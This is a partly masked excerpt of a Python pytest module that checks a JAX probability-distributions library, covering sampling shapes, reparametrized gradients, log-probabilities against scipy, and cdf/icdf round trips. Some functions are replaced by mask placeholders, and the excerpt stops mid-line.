"step-3": "<mask token>\n\n\ndef my_kron(A, B):\n D = A[..., :, None, :, None] * B[..., None, :, None, :]\n ds = D.shape\n newshape = *ds[:-4], ds[-4] * ds[-3], ds[-2] * ds[-1]\n return D.reshape(newshape)\n\n\ndef _identity(x):\n return x\n\n\n<mask token>\n\n\ndef sde_fn1(x, _):\n lam = 0.1\n sigma2 = 0.1\n return lam * x, sigma2\n\n\n<mask token>\n\n\nclass T(namedtuple('TestCase', ['jax_dist', 'sp_dist', 'params'])):\n\n def __new__(cls, jax_dist, *params):\n sp_dist = get_sp_dist(jax_dist)\n return super(cls, T).__new__(cls, jax_dist, sp_dist, params)\n\n\ndef _mvn_to_scipy(loc, cov, prec, tril):\n jax_dist = dist.MultivariateNormal(loc, cov, prec, tril)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_normal(mean=mean, cov=cov)\n\n\ndef _multivariate_t_to_scipy(df, loc, tril):\n if scipy.__version__ < '1.6.0':\n pytest.skip(\n 'Multivariate Student-T distribution is not available in scipy < 1.6'\n )\n jax_dist = dist.MultivariateStudentT(df, loc, tril)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_t(loc=mean, shape=cov, df=df)\n\n\ndef _lowrank_mvn_to_scipy(loc, cov_fac, cov_diag):\n jax_dist = dist.LowRankMultivariateNormal(loc, cov_fac, cov_diag)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_normal(mean=mean, cov=cov)\n\n\n<mask token>\n\n\ndef _TruncatedNormal(loc, scale, low, high):\n return dist.TruncatedNormal(loc=loc, scale=scale, low=low, high=high)\n\n\ndef _TruncatedCauchy(loc, scale, low, high):\n return dist.TruncatedCauchy(loc=loc, scale=scale, low=low, high=high)\n\n\n<mask token>\n\n\nclass SineSkewedUniform(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n lower, upper = np.array([-math.pi, -math.pi]), np.array([math.pi,\n math.pi])\n base_dist = dist.Uniform(lower, upper, **kwargs).to_event(lower.ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_uniform(self: SineSkewedUniform, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None,\n skewness=skewness)\n\n\nclass SineSkewedVonMises(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = np.array([0.0]), np.array([1.0])\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc\n .ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n<mask token>\n\n\nclass SineSkewedVonMisesBatched(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = np.array([0.0, -1.234]), np.array([1.0, 10.0])\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc\n .ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_von_mises_batched(self:\n SineSkewedVonMisesBatched, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None,\n skewness=skewness)\n\n\nclass _GaussianMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, scale):\n component_dist = dist.Normal(loc=loc, scale=scale)\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(mixing_distribution=mixing_distribution,\n component_distribution=component_dist)\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def scale(self):\n return self.component_distribution.scale\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_mixture(self: _GaussianMixture, loc=None, scale=None):\n component_distribution = vmap_over(self.component_distribution, loc=loc,\n scale=scale)\n return vmap_over.dispatch(dist.MixtureSameFamily)(self,\n _component_distribution=component_distribution)\n\n\nclass _Gaussian2DMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, covariance_matrix):\n component_dist = dist.MultivariateNormal(loc=loc, covariance_matrix\n =covariance_matrix)\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(mixing_distribution=mixing_distribution,\n component_distribution=component_dist)\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def covariance_matrix(self):\n return self.component_distribution.covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_2d_mixture(self: _Gaussian2DMixture, loc=None):\n component_distribution = vmap_over(self.component_distribution, loc=loc)\n return vmap_over.dispatch(dist.MixtureSameFamily)(self,\n _component_distribution=component_distribution)\n\n\nclass _GeneralMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, scales):\n component_dists = [dist.Normal(loc=loc_, scale=scale_) for loc_,\n scale_ in zip(locs, scales)]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(mixing_distribution=mixing_distribution,\n component_distributions=component_dists)\n\n @property\n def locs(self):\n return self.component_distributions[0].loc\n\n @property\n def scales(self):\n return self.component_distributions[0].scale\n\n\n@vmap_over.register\ndef _vmap_over_general_mixture(self: _GeneralMixture, locs=None, scales=None):\n component_distributions = [vmap_over(d, loc=locs, scale=scales) for d in\n self.component_distributions]\n return vmap_over.dispatch(dist.MixtureGeneral)(self,\n _component_distributions=component_distributions)\n\n\nclass _General2DMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, covariance_matrices):\n component_dists = [dist.MultivariateNormal(loc=loc_,\n covariance_matrix=covariance_matrix) for loc_,\n covariance_matrix in zip(locs, covariance_matrices)]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(mixing_distribution=mixing_distribution,\n component_distributions=component_dists)\n\n @property\n def locs(self):\n return self.component_distributions[0].loc\n\n @property\n def covariance_matrices(self):\n return self.component_distributions[0].covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_general_2d_mixture(self: _General2DMixture, locs=None):\n component_distributions = [vmap_over(d, loc=locs) for d in self.\n component_distributions]\n return vmap_over.dispatch(dist.MixtureGeneral)(self,\n _component_distributions=component_distributions)\n\n\nclass _ImproperWrapper(dist.ImproperUniform):\n\n def sample(self, key, sample_shape=()):\n transform = biject_to(self.support)\n prototype_value = jnp.zeros(self.event_shape)\n unconstrained_event_shape = jnp.shape(transform.inv(prototype_value))\n shape = sample_shape + self.batch_shape + unconstrained_event_shape\n unconstrained_samples = random.uniform(key, shape, minval=-2, maxval=2)\n return transform(unconstrained_samples)\n\n\nclass ZeroInflatedPoissonLogits(dist.discrete.ZeroInflatedLogits):\n arg_constraints = {'rate': constraints.positive, 'gate_logits':\n constraints.real}\n pytree_data_fields = 'rate',\n\n def __init__(self, rate, gate_logits, *, validate_args=None):\n self.rate = rate\n super().__init__(dist.Poisson(rate), gate_logits, validate_args=\n validate_args)\n\n\n@vmap_over.register\ndef _vmap_over_zero_inflated_poisson_logits(self: ZeroInflatedPoissonLogits,\n rate=None, gate_logits=None):\n dist_axes = vmap_over.dispatch(dist.discrete.ZeroInflatedLogits)(self,\n base_dist=vmap_over(self.base_dist, rate=rate), gate_logits=\n gate_logits, gate=gate_logits)\n dist_axes.rate = rate\n return dist_axes\n\n\nclass SparsePoisson(dist.Poisson):\n\n def __init__(self, rate, *, validate_args=None):\n super().__init__(rate, is_sparse=True, validate_args=validate_args)\n\n\nclass FoldedNormal(dist.FoldedDistribution):\n arg_constraints = {'loc': constraints.real, 'scale': constraints.positive}\n\n def __init__(self, loc, scale, validate_args=None):\n self.loc = loc\n self.scale = scale\n super().__init__(dist.Normal(loc, scale), validate_args=validate_args)\n\n\n@vmap_over.register\ndef _vmap_over_folded_normal(self: 'FoldedNormal', loc=None, scale=None):\n d = vmap_over.dispatch(dist.FoldedDistribution)(self, base_dist=\n vmap_over(self.base_dist, loc=loc, scale=scale))\n d.loc = loc\n d.scale = scale\n return d\n\n\nclass _SparseCAR(dist.CAR):\n reparametrized_params = ['loc', 'correlation', 'conditional_precision']\n\n def __init__(self, loc, correlation, conditional_precision, adj_matrix,\n *, is_sparse=True, validate_args=None):\n super().__init__(loc, correlation, conditional_precision,\n adj_matrix, is_sparse=True, validate_args=validate_args)\n\n\n<mask token>\n\n\ndef get_sp_dist(jax_dist):\n classes = jax_dist.mro() if isinstance(jax_dist, type) else [jax_dist]\n for cls in classes:\n if cls in _DIST_MAP:\n return _DIST_MAP[cls]\n\n\n<mask token>\n\n\ndef _is_batched_multivariate(jax_dist):\n return len(jax_dist.event_shape) > 0 and len(jax_dist.batch_shape) > 0\n\n\ndef gen_values_within_bounds(constraint, size, key=random.PRNGKey(11)):\n eps = 1e-06\n if constraint is constraints.boolean:\n return random.bernoulli(key, shape=size)\n elif isinstance(constraint, constraints.greater_than):\n return jnp.exp(random.normal(key, size)) + constraint.lower_bound + eps\n elif isinstance(constraint, constraints.integer_interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.randint(key, size, lower_bound, upper_bound + 1)\n elif isinstance(constraint, constraints.integer_greater_than):\n return constraint.lower_bound + random.poisson(key, np.array(5),\n shape=size)\n elif isinstance(constraint, constraints.interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.uniform(key, size, minval=lower_bound, maxval=upper_bound\n )\n elif constraint in (constraints.real, constraints.real_vector):\n return random.normal(key, size)\n elif constraint is constraints.simplex:\n return osp.dirichlet.rvs(alpha=jnp.ones((size[-1],)), size=size[:-1])\n elif isinstance(constraint, constraints.multinomial):\n n = size[-1]\n return multinomial(key, p=jnp.ones((n,)) / n, n=constraint.\n upper_bound, shape=size[:-1])\n elif constraint is constraints.corr_cholesky:\n return signed_stick_breaking_tril(random.uniform(key, size[:-2] + (\n size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1))\n elif constraint is constraints.corr_matrix:\n cholesky = signed_stick_breaking_tril(random.uniform(key, size[:-2] +\n (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1))\n return jnp.matmul(cholesky, jnp.swapaxes(cholesky, -2, -1))\n elif constraint is constraints.lower_cholesky:\n return jnp.tril(random.uniform(key, size))\n elif constraint is constraints.positive_definite:\n x = random.normal(key, size)\n return jnp.matmul(x, jnp.swapaxes(x, -2, -1))\n elif constraint is constraints.ordered_vector:\n x = jnp.cumsum(random.exponential(key, size), -1)\n return x - random.normal(key, size[:-1] + (1,))\n elif isinstance(constraint, constraints.independent):\n return gen_values_within_bounds(constraint.base_constraint, size, key)\n elif constraint is constraints.sphere:\n x = random.normal(key, size)\n return x / jnp.linalg.norm(x, axis=-1)\n elif constraint is constraints.l1_ball:\n key1, key2 = random.split(key)\n sign = random.bernoulli(key1)\n bounds = [0, (-1) ** sign * 0.5]\n return random.uniform(key, size, float, *sorted(bounds))\n else:\n raise NotImplementedError('{} not implemented.'.format(constraint))\n\n\ndef gen_values_outside_bounds(constraint, size, key=random.PRNGKey(11)):\n if constraint is constraints.boolean:\n return random.bernoulli(key, shape=size) - 2\n elif isinstance(constraint, constraints.greater_than):\n return constraint.lower_bound - jnp.exp(random.normal(key, size))\n elif isinstance(constraint, constraints.integer_interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n return random.randint(key, size, lower_bound - 1, lower_bound)\n elif isinstance(constraint, constraints.integer_greater_than):\n return constraint.lower_bound - random.poisson(key, np.array(5),\n shape=size)\n elif isinstance(constraint, constraints.interval):\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.uniform(key, size, minval=upper_bound, maxval=\n upper_bound + 1.0)\n elif constraint in [constraints.real, constraints.real_vector]:\n return lax.full(size, np.nan)\n elif constraint is constraints.simplex:\n return osp.dirichlet.rvs(alpha=jnp.ones((size[-1],)), size=size[:-1]\n ) + 0.01\n elif isinstance(constraint, constraints.multinomial):\n n = size[-1]\n return multinomial(key, p=jnp.ones((n,)) / n, n=constraint.\n upper_bound, shape=size[:-1]) + 1\n elif constraint is constraints.corr_cholesky:\n return signed_stick_breaking_tril(random.uniform(key, size[:-2] + (\n size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1)) + 0.01\n elif constraint is constraints.corr_matrix:\n cholesky = 0.01 + signed_stick_breaking_tril(random.uniform(key, \n size[:-2] + (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1)\n )\n return jnp.matmul(cholesky, jnp.swapaxes(cholesky, -2, -1))\n elif constraint is constraints.lower_cholesky:\n return random.uniform(key, size)\n elif constraint is constraints.positive_definite:\n return random.normal(key, size)\n elif constraint is constraints.ordered_vector:\n x = jnp.cumsum(random.exponential(key, size), -1)\n return x[..., ::-1]\n elif isinstance(constraint, constraints.independent):\n return gen_values_outside_bounds(constraint.base_constraint, size, key)\n elif constraint is constraints.sphere:\n x = random.normal(key, size)\n x = x / jnp.linalg.norm(x, axis=-1, keepdims=True)\n return 2 * x\n elif constraint is constraints.l1_ball:\n key1, key2 = random.split(key)\n sign = random.bernoulli(key1)\n bounds = [(-1) ** sign * 1.1, (-1) ** sign * 2]\n return random.uniform(key, size, float, *sorted(bounds))\n else:\n raise NotImplementedError('{} not implemented.'.format(constraint))\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\ndef test_dist_shape(jax_dist, sp_dist, params, prepend_shape):\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n expected_shape = (prepend_shape + jax_dist.batch_shape + jax_dist.\n event_shape)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert isinstance(samples, jnp.ndarray)\n assert jnp.shape(samples) == expected_shape\n if sp_dist and not _is_batched_multivariate(jax_dist) and not isinstance(\n jax_dist, dist.MultivariateStudentT):\n sp_dist = sp_dist(*params)\n sp_samples = sp_dist.rvs(size=prepend_shape + jax_dist.batch_shape)\n assert jnp.shape(sp_samples) == expected_shape\n elif sp_dist and not _is_batched_multivariate(jax_dist) and isinstance(\n jax_dist, dist.MultivariateStudentT):\n sp_dist = sp_dist(*params)\n size_ = prepend_shape + jax_dist.batch_shape\n size = 1 if size_ == () else size_\n try:\n sp_samples = sp_dist.rvs(size=size)\n except ValueError:\n pytest.skip(\n \"scipy multivariate t doesn't support size with > 1 element\")\n assert jnp.shape(sp_samples) == expected_shape\n if isinstance(jax_dist, (dist.MultivariateNormal, dist.\n MultivariateStudentT)):\n assert jax_dist.covariance_matrix.ndim == len(jax_dist.batch_shape) + 2\n assert_allclose(jax_dist.precision_matrix, jnp.linalg.inv(jax_dist.\n covariance_matrix), rtol=1e-06)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_infer_shapes(jax_dist, sp_dist, params):\n shapes = tuple(getattr(p, 'shape', ()) for p in params)\n shapes = tuple(x() if callable(x) else x for x in shapes)\n jax_dist = jax_dist(*params)\n try:\n expected_batch_shape, expected_event_shape = type(jax_dist\n ).infer_shapes(*shapes)\n except NotImplementedError:\n pytest.skip(\n f'{type(jax_dist).__name__}.infer_shapes() is not implemented')\n assert jax_dist.batch_shape == expected_batch_shape\n assert jax_dist.event_shape == expected_event_shape\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_has_rsample(jax_dist, sp_dist, params):\n jax_dist = jax_dist(*params)\n masked_dist = jax_dist.mask(False)\n indept_dist = jax_dist.expand_by([2]).to_event(1)\n transf_dist = dist.TransformedDistribution(jax_dist, biject_to(\n constraints.real))\n assert masked_dist.has_rsample == jax_dist.has_rsample\n assert indept_dist.has_rsample == jax_dist.has_rsample\n assert transf_dist.has_rsample == jax_dist.has_rsample\n if jax_dist.has_rsample:\n assert isinstance(jax_dist, dist.Delta) or not jax_dist.is_discrete\n if isinstance(jax_dist, dist.TransformedDistribution):\n assert jax_dist.base_dist.has_rsample\n else:\n assert set(jax_dist.arg_constraints) == set(jax_dist.\n reparametrized_params)\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.Normal):\n masked_dist.rsample(random.PRNGKey(0))\n indept_dist.rsample(random.PRNGKey(0))\n transf_dist.rsample(random.PRNGKey(0))\n else:\n with pytest.raises(NotImplementedError):\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.BernoulliProbs):\n with pytest.raises(NotImplementedError):\n masked_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n indept_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n transf_dist.rsample(random.PRNGKey(0))\n\n\[email protected]('batch_shape', [(), (4,), (3, 2)])\ndef test_unit(batch_shape):\n log_factor = random.normal(random.PRNGKey(0), batch_shape)\n d = dist.Unit(log_factor=log_factor)\n x = d.sample(random.PRNGKey(1))\n assert x.shape == batch_shape + (0,)\n assert (d.log_prob(x) == log_factor).all()\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS)\ndef test_sample_gradient(jax_dist, sp_dist, params):\n gamma_derived_params = {'Gamma': ['concentration'], 'Beta': [\n 'concentration1', 'concentration0'], 'BetaProportion': ['mean',\n 'concentration'], 'Chi2': ['df'], 'Dirichlet': ['concentration'],\n 'InverseGamma': ['concentration'], 'LKJ': ['concentration'],\n 'LKJCholesky': ['concentration'], 'StudentT': ['df']}.get(jax_dist.\n __name__, [])\n dist_args = [p for p in (inspect.getfullargspec(jax_dist.__init__)[0][1\n :] if inspect.isclass(jax_dist) else inspect.getfullargspec(\n jax_dist)[0])]\n params_dict = dict(zip(dist_args[:len(params)], params))\n jax_class = type(jax_dist(**params_dict))\n reparametrized_params = [p for p in jax_class.reparametrized_params if \n p not in gamma_derived_params]\n if not reparametrized_params:\n pytest.skip('{} not reparametrized.'.format(jax_class.__name__))\n nonrepara_params_dict = {k: v for k, v in params_dict.items() if k not in\n reparametrized_params}\n repara_params = tuple(v for k, v in params_dict.items() if k in\n reparametrized_params)\n rng_key = random.PRNGKey(0)\n\n def fn(args):\n args_dict = dict(zip(reparametrized_params, args))\n return jnp.sum(jax_dist(**args_dict, **nonrepara_params_dict).\n sample(key=rng_key))\n actual_grad = jax.grad(fn)(repara_params)\n assert len(actual_grad) == len(repara_params)\n eps = 0.001\n for i in range(len(repara_params)):\n if repara_params[i] is None:\n continue\n args_lhs = [(p if j != i else p - eps) for j, p in enumerate(\n repara_params)]\n args_rhs = [(p if j != i else p + eps) for j, p in enumerate(\n repara_params)]\n fn_lhs = fn(args_lhs)\n fn_rhs = fn(args_rhs)\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad[i]) == jnp.shape(repara_params[i])\n assert_allclose(jnp.sum(actual_grad[i]), expected_grad, rtol=0.02,\n atol=0.03)\n\n\[email protected]('jax_dist, params', [(dist.Gamma, (1.0,)), (dist.\n Gamma, (0.1,)), (dist.Gamma, (10.0,)), (dist.Chi2, (1.0,)), (dist.Chi2,\n (0.1,)), (dist.Chi2, (10.0,)), (dist.Beta, (1.0, 1.0)), (dist.StudentT,\n (5.0, 2.0, 4.0))])\ndef test_pathwise_gradient(jax_dist, params):\n rng_key = random.PRNGKey(0)\n N = 1000000\n\n def f(params):\n z = jax_dist(*params).sample(key=rng_key, sample_shape=(N,))\n return (z + z ** 2).mean(0)\n\n def g(params):\n d = jax_dist(*params)\n return d.mean + d.variance + d.mean ** 2\n actual_grad = grad(f)(params)\n expected_grad = grad(g)(params)\n assert_allclose(actual_grad, expected_grad, rtol=0.005)\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\[email protected]('jit', [False, True])\ndef test_log_prob(jax_dist, sp_dist, params, prepend_shape, jit):\n jit_fn = _identity if not jit else jax.jit\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert jax_dist.log_prob(samples\n ).shape == prepend_shape + jax_dist.batch_shape\n truncated_dists = (dist.LeftTruncatedDistribution, dist.\n RightTruncatedDistribution, dist.TwoSidedTruncatedDistribution)\n if sp_dist is None:\n if isinstance(jax_dist, truncated_dists):\n if isinstance(params[0], dist.Distribution):\n loc, scale, low, high = params[0].loc, params[0].scale, params[\n 1], params[2]\n else:\n loc, scale, low, high = params\n if low is None:\n low = -np.inf\n if high is None:\n high = np.inf\n sp_dist = get_sp_dist(type(jax_dist.base_dist))(loc, scale)\n expected = sp_dist.logpdf(samples) - jnp.log(sp_dist.cdf(high) -\n sp_dist.cdf(low))\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected,\n atol=1e-05)\n return\n pytest.skip('no corresponding scipy distn.')\n if _is_batched_multivariate(jax_dist):\n pytest.skip('batching not allowed in multivariate distns.')\n if jax_dist.event_shape and prepend_shape:\n pytest.skip(\n 'batched samples cannot be scored by multivariate distributions.')\n sp_dist = sp_dist(*params)\n try:\n expected = sp_dist.logpdf(samples)\n except AttributeError:\n expected = sp_dist.logpmf(samples)\n except ValueError as e:\n if \"The input vector 'x' must lie within the normal simplex.\" in str(e\n ):\n samples = jax.device_get(samples).astype('float64')\n samples = samples / samples.sum(axis=-1, keepdims=True)\n expected = sp_dist.logpdf(samples)\n else:\n raise e\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected, atol=1e-05)\n\n\ndef test_mixture_log_prob():\n gmm = dist.MixtureSameFamily(dist.Categorical(logits=np.zeros(2)), dist\n .Normal(0, 1).expand([2]))\n actual = gmm.log_prob(0.0)\n expected = dist.Normal(0, 1).log_prob(0.0)\n assert_allclose(actual, expected)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + [T(dist.\n Poisson, 2.0), T(dist.Poisson, np.array([2.0, 3.0, 5.0]))])\[email protected]('ignore:overflow encountered:RuntimeWarning')\ndef test_cdf_and_icdf(jax_dist, sp_dist, params):\n d = jax_dist(*params)\n if d.event_dim > 0:\n pytest.skip(\n 'skip testing cdf/icdf methods of multivariate distributions')\n samples = d.sample(key=random.PRNGKey(0), sample_shape=(100,))\n quantiles = random.uniform(random.PRNGKey(1), (100,) + d.shape())\n try:\n rtol = 0.002 if jax_dist in (dist.Gamma, dist.StudentT) else 1e-05\n if d.shape() == () and not d.is_discrete:\n assert_allclose(jax.vmap(jax.grad(d.cdf))(samples), jnp.exp(d.\n log_prob(samples)), atol=1e-05, rtol=rtol)\n assert_allclose(jax.vmap(jax.grad(d.icdf))(quantiles), jnp.exp(\n -d.log_prob(d.icdf(quantiles))), atol=1e-05, rtol=rtol)\n assert_allclose(d.cdf(d.icdf(quantiles)), quantiles, atol=1e-05,\n rtol=1e-05)\n assert_allclose(d.icdf(d.cdf(samples)), samples, atol=1e-05, rtol=rtol)\n except NotImplementedError:\n pass\n if not sp_dist:\n pytest.skip('no corresponding scipy distn.')\n sp_dist = sp_dist(*params)\n try:\n actual_cdf = d.cdf(samples)\n expected_cdf = sp_dist.cdf(samples)\n assert_allclose(actual_cdf, expected_cdf, atol=1e-05, rtol=1e-05)\n actual_icdf = d.icdf(quantiles)\n expected_icdf = sp_dist.ppf(quantiles)\n assert_allclose(actual_icdf, expected_icdf, atol=0.0001, rtol=0.0001)\n except NotImplementedError:\n pass\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DIRECTIONAL)\ndef test_gof(jax_dist, sp_dist, params):\n if 'Improper' in jax_dist.__name__:\n pytest.skip('distribution has improper .log_prob()')\n if 'LKJ' in jax_dist.__name__:\n pytest.xfail('incorrect submanifold scaling')\n if jax_dist is dist.EulerMaruyama:\n d = jax_dist(*params)\n if d.event_dim > 1:\n pytest.skip(\n 'EulerMaruyama skip test when event shape is non-trivial.')\n num_samples = 10000\n if 'BetaProportion' in jax_dist.__name__:\n num_samples = 20000\n rng_key = random.PRNGKey(0)\n d = jax_dist(*params)\n samples = d.sample(key=rng_key, sample_shape=(num_samples,))\n probs = np.exp(d.log_prob(samples))\n dim = None\n if jax_dist is dist.ProjectedNormal:\n dim = samples.shape[-1] - 1\n probs = probs.reshape(num_samples, -1)\n samples = samples.reshape(probs.shape + d.event_shape)\n if 'Dirichlet' in jax_dist.__name__:\n samples = samples[..., :-1]\n for b in range(probs.shape[1]):\n try:\n gof = auto_goodness_of_fit(samples[:, b], probs[:, b], dim=dim)\n except InvalidTest:\n pytest.skip('expensive test')\n else:\n assert gof > TEST_FAILURE_RATE\n\n\n<mask token>\n\n\ndef _tril_cholesky_to_tril_corr(x):\n w = vec_to_tril_matrix(x, diagonal=-1)\n diag = jnp.sqrt(1 - jnp.sum(w ** 2, axis=-1))\n cholesky = w + jnp.expand_dims(diag, axis=-1) * jnp.identity(w.shape[-1])\n corr = jnp.matmul(cholesky, cholesky.T)\n return matrix_to_tril_vec(corr, diagonal=-1)\n\n\[email protected]('dimension', [2, 3, 5])\ndef test_log_prob_LKJCholesky_uniform(dimension):\n d = dist.LKJCholesky(dimension=dimension, concentration=1)\n N = 5\n corr_log_prob = []\n for i in range(N):\n sample = d.sample(random.PRNGKey(i))\n log_prob = d.log_prob(sample)\n sample_tril = matrix_to_tril_vec(sample, diagonal=-1)\n cholesky_to_corr_jac = np.linalg.slogdet(jax.jacobian(\n _tril_cholesky_to_tril_corr)(sample_tril))[1]\n corr_log_prob.append(log_prob - cholesky_to_corr_jac)\n corr_log_prob = np.array(corr_log_prob)\n assert_allclose(corr_log_prob, jnp.broadcast_to(corr_log_prob[0],\n corr_log_prob.shape), rtol=1e-06)\n if dimension == 2:\n assert_allclose(corr_log_prob[0], jnp.log(0.5), rtol=1e-06)\n\n\[email protected]('dimension', [2, 3, 5])\[email protected]('concentration', [0.6, 2.2])\ndef test_log_prob_LKJCholesky(dimension, concentration):\n d = dist.LKJCholesky(dimension, concentration, sample_method='cvine')\n beta_sample = d._beta.sample(random.PRNGKey(0))\n beta_log_prob = jnp.sum(d._beta.log_prob(beta_sample))\n partial_correlation = 2 * beta_sample - 1\n affine_logdet = beta_sample.shape[-1] * jnp.log(2)\n sample = signed_stick_breaking_tril(partial_correlation)\n inv_tanh = lambda t: jnp.log((1 + t) / (1 - t)) / 2\n inv_tanh_logdet = jnp.sum(jnp.log(vmap(grad(inv_tanh))(\n partial_correlation)))\n unconstrained = inv_tanh(partial_correlation)\n corr_cholesky_logdet = biject_to(constraints.corr_cholesky\n ).log_abs_det_jacobian(unconstrained, sample)\n signed_stick_breaking_logdet = corr_cholesky_logdet + inv_tanh_logdet\n actual_log_prob = d.log_prob(sample)\n expected_log_prob = (beta_log_prob - affine_logdet -\n signed_stick_breaking_logdet)\n assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-05)\n assert_allclose(jax.jit(d.log_prob)(sample), d.log_prob(sample), atol=2e-06\n )\n\n\ndef test_zero_inflated_logits_probs_agree():\n concentration = np.exp(np.random.normal(1))\n rate = np.exp(np.random.normal(1))\n d = dist.GammaPoisson(concentration, rate)\n gate_logits = np.random.normal(0)\n gate_probs = expit(gate_logits)\n zi_logits = dist.ZeroInflatedDistribution(d, gate_logits=gate_logits)\n zi_probs = dist.ZeroInflatedDistribution(d, gate=gate_probs)\n sample = np.random.randint(0, 20, (1000, 100))\n assert_allclose(zi_probs.log_prob(sample), zi_logits.log_prob(sample))\n\n\n<mask token>\n\n\[email protected]('total_count', [1, 2, 3, 10])\[email protected]('shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_beta_binomial_log_prob(total_count, shape):\n concentration0 = np.exp(np.random.normal(size=shape))\n concentration1 = np.exp(np.random.normal(size=shape))\n value = jnp.arange(1 + total_count)\n num_samples = 100000\n probs = np.random.beta(concentration1, concentration0, size=(\n num_samples,) + shape)\n log_probs = dist.Binomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.BetaBinomial(concentration1, concentration0, total_count\n ).log_prob(value)\n assert_allclose(actual, expected, rtol=0.02)\n\n\[email protected]('total_count', [1, 2, 3, 10])\[email protected]('batch_shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_dirichlet_multinomial_log_prob(total_count, batch_shape):\n event_shape = 3,\n concentration = np.exp(np.random.normal(size=batch_shape + event_shape))\n value = total_count * jnp.eye(event_shape[-1]).reshape(event_shape + (1\n ,) * len(batch_shape) + event_shape)\n num_samples = 100000\n probs = dist.Dirichlet(concentration).sample(random.PRNGKey(0), (\n num_samples, 1))\n log_probs = dist.Multinomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.DirichletMultinomial(concentration, total_count).log_prob(\n value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_gamma_poisson_log_prob(shape):\n gamma_conc = np.exp(np.random.normal(size=shape))\n gamma_rate = np.exp(np.random.normal(size=shape))\n value = jnp.arange(15)\n num_samples = 300000\n poisson_rate = np.random.gamma(gamma_conc, 1 / gamma_rate, size=(\n num_samples,) + shape)\n log_probs = dist.Poisson(poisson_rate).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.GammaPoisson(gamma_conc, gamma_rate).log_prob(value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_log_prob_gradient(jax_dist, sp_dist, params):\n if jax_dist in [dist.LKJ, 